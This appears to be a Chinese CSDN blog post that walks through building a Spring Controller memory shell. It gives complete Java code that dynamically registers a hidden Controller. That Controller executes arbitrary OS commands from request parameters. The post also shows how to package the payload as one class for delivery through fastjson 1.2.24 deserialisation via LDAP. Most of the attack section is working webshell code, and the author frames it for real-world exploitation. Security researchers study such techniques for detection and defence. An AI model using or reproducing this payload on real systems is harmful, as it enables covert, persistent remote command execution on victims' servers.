实战分享!spring内存马(Controller)构造

最新推荐文章于 2024-09-18 09:14:32 发布
最新推荐文章于 2024-09-18 09:14:32 发布
阅读量665 收藏
点赞数
文章标签: spring firefox java 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MachineGunJoe/article/details/131555916
版权

spring部分运行机制

我们在controller处下断点

可以看到红框是涉及spring的部分,因为调用栈的帧顺序是从下往上,也就是下面的先运行,我们从下往上看。

可以看到先run运行起来,然后进入process部分,在进入service部分,进入invoke部分,进入dofilter部分,在返回到service部分,然后就进入了spring中,spring中继续请求,到doDispatch中进行请求的处理。

可以看到DispatcherServlet类中的doDispatch方法进行处理web请求。

这个方法中用handle()进行处理request和response,并且用 mappedHandler.getHandler()获取了mappedHandler的Handler。

那么老样子,我们先不看调用,先看handle()的参数中的mappedHandler.getHandler()。我们看看mappedHandler是干什么的。

这里用了getHandler(processedRequest),那么我们跳入。

可以看到这里对handlerMappings(处理器映射)进行了遍历,调用mappedHandler的getHandler()方法对processedRequest进行了遍历。

handlerMappings介绍:

接着我们继续跟进mapping.getHandler。

跟进之后是个接口,那么找其实现。

我们进入AbstractHandlerMapping。

可以看到用到了getHandlerInternal()方法。

可以看到对mappingRegistry(spring的路径注册)上了锁,acquireReadLock方法用于获取读锁,如果持有写锁的线程数量或请求读锁的线程数大于0则让线程进入等待状态,releaseReadLock方法用于释放读锁,将读锁线程数减一并唤醒其它线程,acquireWriteLock方法用于获取写锁,如果持有读锁的线程数量或持有写锁的线程数量大于0则让线程进入等待状态。releaseWriteLock方法用于释放写锁,将写锁线程数减一并唤醒其它线程。mappingRegistry中存有路由信息如下:

继续回到getHandlerInternal看看。

因为lookupHandlerMethod()涉及请求,传入的参数是lookupPath和request,那么我们看看他是干嘛的。

阅读这一块代码,这里通过mappingRegistry获得请求映射地址,如果directPathMatches不为null,则调addMatchingMappings()进行添加路由,这里可以理解成 集合中的每一个RequestMappingInfo均会和request进行匹配,匹配上的话就创建一个Match对象并加入Match对象集合。

然后就是Matches的校验了,如果为null,就用mappingRegistry.getRegistrations()注册,Match集合不为空则从Match集合中找到最匹配的Match对象,并返回该Match对象的HandlerMethod对象。

也就是说模拟注册向mappingRegistry中添加内存马路由,就能注入内存马。

在AbstractHandlerMethodMapping中就提供了MappingRegistry添加路由。但是该类为抽象类。它的子类RequestMappingHandlerMapping能进行实例化。

RequestMappingInfoHandlerMapping也是抽象类,所以只能用RequestMappingHandlerMapping的registerMapping方法去进行注册(也就是通过AbstractHandlerMethodMapping的子类,也就是实现类去进行注册)。

一个spring内存马的生成

获取webApplicationContext

之前写的tomcat内存马,也是先需要获得容器的context对象。在tomcat中获得的是standardContext,spring中获取的是WebApplicationContext。

可以看到初始化WebApplicationContext的过程,那么如何获得WebApplicationContext呢?

那么这样就可以得到WebApplicationContext对象了,当然不只这一种方法,我们先往下走。

注册Controller

有了WebApplicationContext,接下来便是注册Controller,在第一部分《spring部分运行机制》中我们说了在AbstractHandlerMethodMapping中就提供了MappingRegistry添加路由。但是该类为抽象类。它的子类RequestMappingHandlerMapping能进行实例化。

可以看到RequestMappingHandlerMapping的registerMapping有三个参数mapping,handler,method

那么我们先看看第一个参数mapping怎么写,跳入看看mapping的类型的RequestMappingInfo的构造函数。

有四种,我们用的是第二种构造函数,共7个参数。

/** @deprecated */
@Deprecated
public RequestMappingInfo(@Nullable PatternsRequestCondition patterns, @Nullable RequestMethodsRequestCondition methods, @Nullable ParamsRequestCondition params, @Nullable HeadersRequestCondition headers, @Nullable ConsumesRequestCondition consumes, @Nullable ProducesRequestCondition produces, @Nullable RequestCondition<?> custom) {
    this((String)null, patterns, methods, params, headers, consumes, produces, custom);
}

再看第一个参数patterns的构造函数,PatternsRequestCondition是路径匹配,也就是定义访问 controller 的 URL 地址,那么这里写url。

第二个参数是method,我们进入看其构造办法。

然后写到如下:

再写命令执行的代码

@RestController
public class Injected{
    public Injected(){

    }
    public void cmd() throws Exception {
        HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();
        HttpServletResponse response = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getResponse();
        if (request.getParameter("cmd") !=null){
            boolean islinux = true;
            String osType = System.getProperty("os.name");
            if (osType !=null && osType.toLowerCase().contains("win")){
                islinux = false;
            }
            String[] cmds = islinux ? new String[]{"sh","-c",request.getParameter("cmd")} : new String[]{"cmd.exe","/c",request.getParameter("cmd")};
            InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
            Scanner s = new Scanner(in).useDelimiter("\\A");
            String output = s.hasNext() ? s.next() : "";
            response.getWriter().write(output);
            response.getWriter().flush();
            response.getWriter().close();
        }
    }
}

中间遇到的问题

40行会报错,是39行的问题。

我们调试看servletContext获取值是没问题的,那么就是WebApplicationContext获取值失败

那么。

WebApplicationContext webApplicationContext = (WebApplicationContext)servletContext.getAttribute(WebApplicationContext.ROOT_WEB_APPLICATION_CONTEXT_ATTRIBUTE);

不行,那么换种方法获取webApplicationContext。

WebApplicationContext webApplicationContext = WebApplicationContextUtils.getRequiredWebApplicationContext(servletContext);

这样获取也会报错Request processing failed; nested exception is java.lang.IllegalStateException: No WebApplicationContext found: no ContextLoaderListener registered?也不行,再换种方法。

WebApplicationContext webApplicationContext = WebApplicationContextUtils.getWebApplicationContext(servletContext);

这里报错是有可能为空,所以我修改加了if判断。

但是访问不了url还是注入失败了,如下。

那么再换种方法

WebApplicationContext webApplicationContext = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);

但是访问不了url还是注入失败了,如下。

报错代理问题,不知道怎么解决,那么再看看哪里的问题这里经过一顿排查。

这里之前写错了,要写Injected这个类,那么。

WebApplicationContext webApplicationContext = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);

这种是可以的,其他还是不行,如下。

完整代码如下:

package com.example.demo;

import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.context.ContextLoader;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.context.support.WebApplicationContextUtils;
import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;

import javax.servlet.ServletContext;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.InputStream;
import java.lang.reflect.Method;
import java.util.Scanner;

@RestController
public class Controller_ncm {


    @RequestMapping("/inject")
    public  String inject() throws Exception {
        //获得request对象
//        HttpServletRequest request =  ((ServletRequestAttributes) RequestContextHolder.getRequestAttributes()).getRequest();
//        //获得ServletContext对象
//        ServletContext servletContext = request.getServletContext();
//    ServletContext servletContext2 = ContextLoader.getCurrentWebApplicationContext().getServletContext();
        //获得WebApplicationContext对象

//        WebApplicationContext webApplicationContext = (WebApplicationContext)servletContext.getAttribute(WebApplicationContext.ROOT_WEB_APPLICATION_CONTEXT_ATTRIBUTE);
        WebApplicationContext webApplicationContext = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
//        WebApplicationContext webApplicationContext = WebApplicationContextUtils.getRequiredWebApplicationContext(servletContext);
//        WebApplicationContext webApplicationContext = WebApplicationContextUtils.getWebApplicationContext(servletContext);
        //接下来便是注册Controller了
        //之前我们分析在AbstractHandlerMethodMapping中就提供了MappingRegistry添加路由。但是该类为抽象类。它的子类RequestMappingHandlerMapping能进行实例化
        //从当前上下文环境中获得 RequestMappingHandlerMapping 的实例 bean
        RequestMappingHandlerMapping requestMappingHandlerMapping = webApplicationContext.getBean(RequestMappingHandlerMapping.class);

        Method method = Injected.class.getMethod("cmd");

        RequestMethodsRequestCondition condition  = new RequestMethodsRequestCondition();   //定义允许访问 controller 的 HTTP 方法

        PatternsRequestCondition url = new PatternsRequestCondition("/url");   //路径匹配

        RequestMappingInfo mapping = new RequestMappingInfo(url, condition, null, null, null, null, null);   //这里mapping就写好了

        Injected handler = new Injected();    //注意这个handler是Injected类

        requestMappingHandlerMapping.registerMapping(mapping,handler,method);   //注册controller


        return "Inject done";

    }

    @RestController
    public class Injected{
        public Injected(){

        }
        public void cmd() throws Exception {
            HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();
            HttpServletResponse response = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getResponse();
            if (request.getParameter("cmd") !=null){
                boolean islinux = true;
                String osType = System.getProperty("os.name");
                if (osType !=null && osType.toLowerCase().contains("win")){
                    islinux = false;
                }
                String[] cmds = islinux ? new String[]{"sh","-c",request.getParameter("cmd")} : new String[]{"cmd.exe","/c",request.getParameter("cmd")};
                InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
                Scanner s = new Scanner(in).useDelimiter("\\A");
                String output = s.hasNext() ? s.next() : "";
                response.getWriter().write(output);
                response.getWriter().flush();
                response.getWriter().close();
            }
        }
    }


}

效果:

这里可以写到一个类中,之前那个相当于两个类,一个主类其中嵌套内部类,再进行build之后,可以看到会生成两个类,因为java中的内部类只是java编译器的概念,对于java的虚拟机而言,它是没有java内部类的概念的,也就是说java中的内部类最后也会被编译成一个独立的class文件。

那么在我们进行ldap远程执行恶意类时候,无法同时指定两个类,单纯指定一个类很难生效(因为不包含内部类),那么我们写到一个类中,如下。

package com.example.demo;

import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.lang.reflect.Method;
import java.nio.charset.Charset;

@RestController
public class Evil {
    @RequestMapping("inject5")
    public String Evil() throws Exception {

        WebApplicationContext context = (WebApplicationContext) RequestContextHolder.
                currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
        // 从当前上下文环境中获得 RequestMappingHandlerMapping 的实例 bean
        RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
        // 通过反射获得该类的test方法
        Method method2 = Evil.class.getMethod("test");
        // 定义该controller的path
        PatternsRequestCondition url = new PatternsRequestCondition("/txf");
        // 定义允许访问的HTTP方法
        RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();
        // 在内存中动态注册 controller
        RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);
        // 创建用于处理请求的对象,避免无限循环使用另一个构造方法
        Evil injectToController = new Evil("aaa");
        // 将该controller注册到Spring容器
        mappingHandlerMapping.registerMapping(info, injectToController, method2);
        return "Inject done";
    }
    private Evil(){

    }
    private Evil(String aaa) {
    }

    public void test() throws IOException {
        HttpServletRequest request = ((ServletRequestAttributes)(RequestContextHolder.currentRequestAttributes())).getRequest();
        HttpServletResponse response = ((ServletRequestAttributes)(RequestContextHolder.currentRequestAttributes())).getResponse();
        String code = request.getParameter("code");
        if(code != null){
            StringBuilder result = new StringBuilder();
            Process process = null;
            BufferedReader bufrIn = null;
            BufferedReader bufrError = null;
            response.setCharacterEncoding("utf-8");
            response.setContentType("text/html,charset=utf-8");
            PrintWriter writer = response.getWriter();
            try {
                ProcessBuilder builder = null;
                if (System.getProperty("os.name").toLowerCase().contains("win")){
                    builder = new ProcessBuilder(new String[]{"cmd.exe","/c",code});
                    Process start = builder.start();
                    bufrIn = new BufferedReader(new InputStreamReader(start.getInputStream(), Charset.forName("GBK")));
                    bufrError = new BufferedReader(new InputStreamReader(start.getInputStream(),Charset.forName("GBK")));
                }else {
                    builder = new ProcessBuilder(new String[]{"/bin/sh","-c",code});
                    Process start = builder.start();
                    bufrIn = new BufferedReader(new InputStreamReader(start.getInputStream(), Charset.forName("UTF-8")));
                    bufrError = new BufferedReader(new InputStreamReader(start.getInputStream(),Charset.forName("UTF-8")));
                }
                String line;
                while ((line = bufrIn.readLine()) != null){
                    result.append(line).append('n').append("</p >");
                }
                while ((line = bufrError.readLine()) != null){
                    result.append(line).append('n').append("</p >");
                }
                System.out.println(result);
                writer.println(result);
                writer.flush();
                writer.close();
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }
}

直接访问404。

那么先访问inject5,将其注入进去。

然后再次访问/txf。

成功注入,执行命令即可。

到这里实验环境注入内存马就成功了,但是我们是直接在项目中加载的,实战中肯定不是这样利用的,那么继续往下看,fastjson漏洞本地项目实验。

springboot版本2.4.5

<parent>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-parent</artifactId>
    <version>2.4.5</version>
    <relativePath/> <!-- lookup parent from repository -->
</parent>

fastjson版本1.2.24

<dependency>
    <groupId>com.alibaba</groupId>
    <artifactId>fastjson</artifactId>
    <version>1.2.24</version>
</dependency>

因为之前网站打印出来乱码,那么修改命令执行那段代码,如下,spring内存马

import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.DataInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.lang.reflect.Method;

public class bat {
    public bat() throws Exception{
        WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
        RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
        Method method = bat.class.getDeclaredMethod("test",HttpServletRequest.class, HttpServletResponse.class);
        PatternsRequestCondition url = new PatternsRequestCondition("/qqq");
        RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();
        bat injectToController = new bat("aaa");
        RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);
        mappingHandlerMapping.registerMapping(info, injectToController, method);


    }
    private bat(String aa){

    }
    public void test(HttpServletRequest request, HttpServletResponse response) throws IOException {
        String code = request.getParameter("code");
        if(code != null){
            Process exec = Runtime.getRuntime().exec(code);
            InputStream inputStream = exec.getInputStream();
            DataInputStream dataInputStream = new DataInputStream(inputStream);
            String disr = dataInputStream.readLine();
            while ( disr != null ) {
                response.getWriter().write(disr);
                disr = dataInputStream.readLine();
            }
        }
        else {
            response.getWriter().write("ADD CONTROLLER");
        }
    }
    }

可以看的spring内存马注入成功,注意springboot版本过高注入失败,会报错。

Root Context和Child Context

获得当前代码运行时的上下文环境(4种,前两种是Root Context,后两种是Child Context,推荐使用后两种),我们这里环境配置的就是在DispatcherServlet中,所以通过Root Context是获取不到的,这样就导致 RequestMappingHandlerMapping 的实例 bean 只存在于 Child WebApplicationContext 环境中,而不是 Root WebApplicationContext 中。上文也提到过,Root Context无法访问Child Context中定义的 bean,而Child Context可以访问Root Context中定义的bean,所以可能会导致 Root WebApplicationContext 获得不了 RequestMappingHandlerMapping 的实例 bean 的情况。

另外,在有些Spring 应用逻辑比较简单的情况下,可能没有配置 ContextLoaderListener 、也没有类似 applicationContext.xml 的全局配置文件,只有简单的 servlet 配置文件,这时候通过前两种方法是获取不到Root WebApplicationContext的。

1.getCurrentWebApplicationContext

WebApplicationContext context = ContextLoader.getCurrentWebApplicationContext();
return context;

失败。

2.WebApplicationContextUtils

WebApplicationContext context = WebApplicationContextUtils.getWebApplicationContext(RequestContextUtils.getWebApplicationContext(((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getRequest()).getServletContext());
return context;

失败

3.RequestContextUtils

WebApplicationContext context = RequestContextUtils.getWebApplicationContext(((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getRequest());
return context;

成功获得context。

4.getAttribute

WebApplicationContext context = (WebApplicationContext)RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
return context;

成功获得context。

我是黑客
关注
Spring Boot进阶(58):轻松搞定数据存储!Spring Boot与PostgreSQL完美集成,让你的应用更稳定更高效!
**My Coding Family**
08-25 1392
Spring Boot如何集成PostgreSQL数据库及实战使用?不会我教你!
Spring Boot入门(15):【实战教程】Spring Boot + MyBatis-Plus 自动生成骨架代码,告别枯燥的重复劳动!
**My Coding Family**
05-08 3117
Spring Boot 整合 MyBatis-Plus AutoGenerator 自动生成项目骨架代码,一文教会你。
Java内存系列 | SpringMVC内存 - 下 | SpringMVC 内存分析
哦 卷!
09-08 1414
整体漏洞利用+写入内存的执行流程是:1)发送payload,即json数据,存在恶意rmi或ladp服务地址(fastjson漏洞)2)服务器收到payload之后,解析payload(fastjson功能),反序列化类,触发访问rmi或ldap服务的功能3)从rmi或ldap服务器请求了恶意的class文件,即内存class文件,加载到受害者服务器中4)受害者服务器执行class文件代码,触发动态注册Controller等代码,在服务其中动态注册了恶意的Controller和映射。
Java安全Spring内存
guanshengg的博客
08-20 484
bean是 Spring 框架的一个核心概念,它是构成应用程序的主干,并且是由Spring IoC容器负责实例化、配置、组装和管理的对象
Spring Controller
最新发布
2401_84881237的博客
09-18 1519
refreshApplicationContext方法:通过ServletWebServerFactory接口定义了getwebServer方法,通过其创建webServer并返回(创建时做了两件重要的事情:把Connector对象添加到tomcat中,配置引擎)【TomcatServletWebServerFactory是接口其中一个实现类】在实现上基于 Java 的反射机制。客户端(浏览器)向服务器 A 发送一个 URL 请求,服务器 A 告知浏览器资源在服务器 B,浏览器会重新发送请求到服务器 B。
针对Spring MVC的Interceptor内存
weixin_45032957的博客
06-10 242
1.2 探索拦截器的调用链 断点打在TestInterceptor类中,调试看看调用链 preHandle:31, TestInterceptor (bitterz.interceptors) applyPreHandle:134, HandlerExecutionChain (org.springframework.web.servlet) doDispatch:956, DispatcherServlet (org.springframework.web.servlet) doService:895,
Spring Controller内存
why811的博客
09-27 677
SpringMVC环境下获取到的是一个XmlWebApplicationContext类型的Root WebApplicationContext:在SpringBoot环境下,默认没有xml文件配置listener,这里获取到的结果会是null。
[Java安全]—Controller内存
Sentiment的博客
11-02 634
Controller内存
再谈Spring内存之Interceptor(内存系列篇十)
阿道夫的博客
03-10 298
在系统中,经常需要在处理用户请求之前和之后执行一些行为,例如检测用户的权限,或者将请求的信息记录到日志中,即平时所说的“权限检测”及“日志记录”。当然不仅仅这些,所以需要一种机制,拦截用户的请求,在请求的前后添加处理逻辑。Spring MVC 提供了 Interceptor 拦截器机制,用于请求的预处理和后处理。在实际应用中常见的作用为:日志记录:记录请求信息的日志,以便进行信息监控、信息统计、计算 PV(Page View)等;权限检查:如登录检测,进入处理器检测是否登录;
Spring Boot开发实战:基于Spring Boot的RESTful API服务的实验心得与案例解析
05-08
### Spring Boot开发实战:基于Spring Boot的RESTful API服务的实验心得与案例解析 #### 一、引言 Spring Boot自发布以来,以其强大的自动配置能力、简洁的开发模式以及丰富的社区支持,迅速成为了Java开发者构建...
Java内存攻防实战——攻击基础篇
JavaMonsterr的博客
05-23 3328
在红蓝对抗中,攻击方广泛应用webshell等技术在防守方提供的服务中植入后门,防守方也发展出各种技术来应对攻击,传统的落地型webshell很容易被攻击方检测和绞杀。而内存技术则是通过在运行的服务中直接插入运行攻击者的webshell逻辑,利用中间件的进程执行某些恶意代码,而不依赖实体文件的存在实现的服务后门,因此具有更好的隐蔽性,也更容易躲避传统安全监测设备的检测。 本文以Java语言为基础讨论内存技术的攻防,分为两个篇章,分别是攻击基础篇和防护应用篇。本篇攻击基础篇介绍了Java Servlet
spring security原理和机制 | Spring Boot 35
热门推荐
学Java,找哪吒
06-25 5万+
一、SpringSecurity 框架简介 Spring 是非常流行和成功的 Java 应用开发框架,Spring Security 正是 Spring 家族中的 成员。Spring Security 基于 Spring 框架,提供了一套 Web 应用安全性的完整解决方 案。 正如你可能知道的关于安全方面的两个主要区域是“认证”和“授权”(或者访问控 制),一般来说,Web 应用的安全性包括用户认证(Authentication)和用户授权 (Authorization)两个部分,这两点也是 Spring
spring回显方式在代码层面的复现(内存系列篇十四)
阿道夫的博客
02-13 618
在前面的一章中,主要在理论上进行了各种内存的实现,这里就做为上一篇的补充,自己搭建反序列化的漏洞环境来进行上文中理论上内存的注入实践。这是内存系列文章的第十四篇。1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking。
内存实战(持续更新中)
qq_44657899的博客
05-16 2371
计划 复现以下框架的内存注入: shiro(aes base64 加密) 普通内存 冰蝎 WebSocket xxl-job filter 冰蝎 netty内存 agent内存 JNDI(字节码里执行) SpringBoot spel表达式注入(spring cloud gateway) Struts2的ognl表达式注入 Tomcat的EL表达式注入 参考:https://gv7.me/articles/2022/the-spring-cloud-gatewa
简要分析学习spring内存,劫持
久恙502的博客
06-01 340
Spring内存的学习,还有待完善。
网络安全】利用Fastjson注入Spring内存
HBohan的博客
11-10 1434
此篇文章在于记录自己对spring内存的实验研究【点击查看→资料】 一、环境搭建 搭建漏洞环境,利用fastjson反序列化,通过JNDI下载恶意的class文件,触发恶意类的构造函数中代码,注入controller内存。 1)组件版本: fastjson: 1.2.24 spring-mvc: 4.3.28.RELEASE JDK: 8u121 2)搭建springMVC+fastjson漏洞环境 可以参考网上的入门文章进行搭建,这里我放出我自己环境的配置文件 web.xml <servle.
Java安全Java Spring内存_动态注册Controller内存
Ho1aAs‘s Blog
04-03 5047
文章目录前言Controller注册分析register()Controller内存原理Ⅰ. 获取RequestMappingHandlerMappingⅡ. 生成RequestMappingInfoⅢ. 写恶意ControllerⅣ. 反射获取恶意方法Ⅴ. 向RequestMappingHandlerMapping注册代码运行截图注意事项参考引用完 前言 SpringBoot版本2.4.5 <parent> <groupId>org.springframe
SpringController
weixin_45747080的博客
05-09 358
SpringController 1、@Controller 以返回字符串的形式返回 @Controller @RequestMapping("test") public class TestController { @Autowired UserService userService; @RequestMapping("selectAllUsername") public String t1(Model model){ List<String>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我是黑客

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值